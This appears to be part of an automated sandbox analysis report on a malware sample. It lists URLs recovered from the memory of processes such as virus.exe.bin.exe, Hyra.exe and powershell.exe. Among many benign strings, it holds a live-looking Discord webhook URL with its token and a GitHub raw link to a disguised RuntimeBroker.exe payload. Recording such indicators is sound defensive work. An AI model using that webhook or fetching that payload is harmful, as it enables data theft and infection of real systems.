Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimit
Source: javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager
Source: javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xalan
Source: javaw.exe, 0000000C.00000002.3911788928.000000000A244000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3930308260.0000000018C74000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588459835.0000000018C6D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.2681083567.0000000018C6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xpath/features/whitespace-pre-stripping
Source: javaw.exe, 0000000C.00000002.3911788928.000000000A2E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xpath/features/whitespace-pre-stripping;
Source: javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xslt
Source: javaw.exe, 0000000C.00000002.3929782050.0000000018C5C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588723004.0000000018C0F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1588901481.0000000018C4D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000002.3911788928.000000000A1E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/external-general-entities
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/external-parameter-entities
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespace-prefixes-
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespaces
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespaces&
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/string-interning
Source: javaw.exe, 0000000C.00000002.3917502159.0000000014B06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/string-interningfeature
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/validation
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/
Source: javaw.exe, 0000000C.00000003.2679299474.0000000014F67000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1595223189.0000000014F5F000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 0000000C.00000003.1696246534.0000000014F66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/lexical-handler
Source: javaw.exe, 0000000C.00000002.3918467886.0000000014EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/xml-string
Source: powershell.exe, 00000005.00000002.2580860064.0000020D95640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2580860064.0000020D95607000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1628873409.000002208E560000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1628873409.000002208E527000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820608682.00000254121D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.github.com/_private/browser/errors
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.github.com/_private/browser/stats
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://avatars.githubusercontent.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://collector.github.com/github/collect
Source: powershell.exe, 00000009.00000002.2284762070.0000025422383000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2284762070.0000025422383000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2284762070.0000025422383000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/webhooks/1352684770521387070/EnDdIPnq1Toz0toXGIhTo1T09Jq8MMJhXvjTWp5MjXqB
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.github.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.github.com/get-started/accessibility/keyboard-shortcuts
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github-cloud.s3.amazonaws.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.blog
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820608682.0000025412E02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AnonAm0369/am/raw/refs/heads
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820608682.0000025412E02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1820608682.00000254121D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe"
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AnonAm0369/am/raw/refs/headsp
Source: powershell.exe, 00000009.00000002.1820608682.0000025412402000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/collections
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/customer-stories
Source: powershell.exe, 00000009.00000002.1820608682.00000254137E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ente
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/enterprise
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/enterprise/startups
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/actions
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/code-review
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/code-search
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/codespaces
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/copilot
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/discussions
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/issues
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/security
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/fluidicon.png
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/readme
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/resources/whitepapers
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/solutions/executive-insights
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/team
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/topics
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/trending
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_as
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_m
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-3e000c5d
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/behaviors-7ebb6421bf22.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/dark-8a995f0bacd4.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/dark_colorblind-cd826e8636dc.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-f
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-f37fb7684b1f.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-fp
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/dark_high_contrast-9ac301c3ebe5.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/dark_tritanopia-18119e682df0.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/element-registry-0bebfa1427c4.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/environment-f04cb2a9fc8c.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/error-3bfb6168c7d5.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/github-43ae85d4871b.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/github-elements-394f8eb34f19.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.png
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/github-mark-57519b92ca4e.png
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/github-octocat-13c86b8b336d.png
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/global-7d4d2344e7ab.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/global-banner-disable-f988792be49f.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/keyboard-shortcuts-dialog-33dfb803e078.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/light-74231a1f3bbb.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/light_colorblind-f91b0f603451.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/light_high_contrast-83beb16e0ecf.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/light_tritanopia-6e122dab64fc.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/mona-sans-d1bf285e9b9b.woff2
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/notifications-global-01e85cd1be94.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/octicons-react-cf2f2ab8dab4.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/primer-aaa714e5674d.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/primer-primitives-225433424a87.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/primer-react-e05a7c4c5398.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/primer-react.50398dad705ce9fff192.module.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/react-core-8d75451d837a.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/react-lib-f1bca44e0926.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/sessions-730dca81d0a2.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/site-3e72ff5534e0.css
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-75968cfb5298.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/ui_packages_ui-commands_ui-commands_ts-46ae788e9cbd.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-2a55124d5c
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-e3180fe3bcb3.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_emotion_is-prop-valid_dist_emotion-is-pr
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-po
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_inde
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_markdown-toolbar-element_dist_ind
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-nod
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-a0
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-be8cb88f4
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-be8cb88f481b.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-be8cb88f4p
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover-fn
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-0dbb
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/assets/wp-runtime-da74d68ae715.js
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/favicons/favicon
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/favicons/favicon.png
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.githubassets.com/favicons/favicon.svg
Source: powershell.exe, 00000009.00000002.1820608682.0000025412E02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.2284762070.0000025422240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2284762070.0000025422383000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://partner.github.com
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/???
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://resources.github.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://resources.github.com/learn/pathways
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://skills.github.com
Source: powershell.exe, 00000009.00000002.1820608682.00000254137ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://user-images.githubusercontent.com/
Source: final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443

